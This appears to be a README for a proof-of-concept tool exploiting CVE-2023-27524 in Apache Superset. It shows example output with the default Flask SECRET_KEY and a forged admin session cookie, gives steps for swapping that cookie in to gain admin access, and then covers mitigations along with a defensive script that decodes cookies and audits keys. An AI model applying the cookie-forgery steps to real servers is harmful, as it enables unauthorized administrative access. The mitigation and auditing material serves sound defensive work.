# CVE-2023-27524: Apache Superset Auth Bypass
Script to check whether an Apache Superset server is vulnerable to CVE-2023-27524 (a default Flask `SECRET_KEY`) and, if it is, forge a session cookie with `user_id = 1`, which is usually the `admin` user, allowing authentication bypass and access to the dashboard. Currently there are about 3000 servers worldwide running Apache Superset.

## Usage

```
usage: python3  --url URL
```


## Basic Example

```
% python3 --url
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
```

Now visit the URL `` and replace the current session cookie with `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg`, then refresh the page: you will be logged in to the dashboard as admin.

## Mitigations
Follow the [instructions here]() to generate and configure a Flask `SECRET_KEY`. The `superset` CLI tool can be used to [rotate the SECRET_KEY]() so that existing database connection information is preserved. Note that the `SECRET_KEY` only provides integrity for the session cookie: the cookie payload is signed, not encrypted, so whoever knows the key can sign arbitrary claims such as `user_id`.
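The following is an added defender-side example, not code from this PoC or from the Superset project. It does two things the sections above describe: it decodes the payload of a Flask session cookie without verifying it (showing that the claims, including `user_id`, are plain base64-encoded JSON, so the `SECRET_KEY` is the only thing standing between a reader and a forger), and it audits the `SECRET_KEY` found in a `superset_config.py` against the default value shown in the example output above. The cookies are the two from the README's example; the config fragment is constructed. `KNOWN_DEFAULT_KEYS` contains only the default this page documents, the 32-character minimum and the diversity threshold are my own assumptions, and `generate_secret_key` uses `secrets.token_urlsafe(42)` as a stdlib stand-in for generating a random key as the Superset docs describe.

```python
import ast
import base64
import json
import secrets
import zlib

# Session cookies copied from the README's example output (input for this script).
ORIGINAL_COOKIE = (
    "eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0"
    ".ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek"
)
FORGED_COOKIE = "eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg"

# Constructed superset_config.py fragment for the audit below.
SAMPLE_CONFIG = '''
ROW_LIMIT = 5000
SECRET_KEY = "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"
'''

# Only the default documented in this README; extend with any other placeholder
# values your deployment history used (assumption: list is maintained locally).
KNOWN_DEFAULT_KEYS = {"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"}


def _b64url_decode(segment: str) -> bytes:
    # itsdangerous strips base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_session_payload(cookie: str) -> dict:
    """Return the claims in a Flask session cookie WITHOUT verifying the signature.

    Layout is payload.timestamp.signature. The payload is base64url JSON, or
    zlib-compressed JSON when the cookie starts with '.'. Nothing is encrypted,
    so any reader can see the claims; only the signature needs the SECRET_KEY.
    """
    compressed = cookie.startswith(".")
    body = cookie[1:] if compressed else cookie
    raw = _b64url_decode(body.split(".")[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def extract_secret_key(config_source: str):
    """Find a literal string assigned to SECRET_KEY in a superset_config.py source."""
    for node in ast.walk(ast.parse(config_source)):
        if not isinstance(node, ast.Assign):
            continue
        value = node.value
        for target in node.targets:
            if (isinstance(target, ast.Name) and target.id == "SECRET_KEY"
                    and isinstance(value, ast.Constant) and isinstance(value.value, str)):
                return value.value
    return None  # not set as a literal (may be loaded from the environment)


def audit_secret_key(secret_key: str, min_length: int = 32) -> list:
    """Return a list of findings; an empty list means no issue was detected."""
    findings = []
    if secret_key in KNOWN_DEFAULT_KEYS:
        findings.append("known default SECRET_KEY: anyone can sign session cookies")
    if len(secret_key) < min_length:
        findings.append(f"SECRET_KEY shorter than {min_length} characters")
    if len(set(secret_key)) < 12:  # assumption: crude check for placeholder-like keys
        findings.append("SECRET_KEY has low character diversity")
    return findings


def generate_secret_key() -> str:
    """Random replacement key; rotate it with the superset CLI so stored DB
    connection secrets are re-encrypted rather than lost."""
    return secrets.token_urlsafe(42)


if __name__ == "__main__":
    for name, cookie in (("original", ORIGINAL_COOKIE), ("forged", FORGED_COOKIE)):
        print(f"{name} cookie claims: {decode_session_payload(cookie)}")
    key = extract_secret_key(SAMPLE_CONFIG)
    print(f"configured SECRET_KEY: {key!r}")
    for finding in audit_secret_key(key) or ["no findings"]:
        print(f"  - {finding}")
    print(f"suggested replacement: {generate_secret_key()}")
```

Run it against a real `superset_config.py` by reading the file into `extract_secret_key`; a key loaded from an environment variable returns `None` and should be audited from the environment instead.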

## Disclaimer
This PoC is created for educational purposes only.

## Reference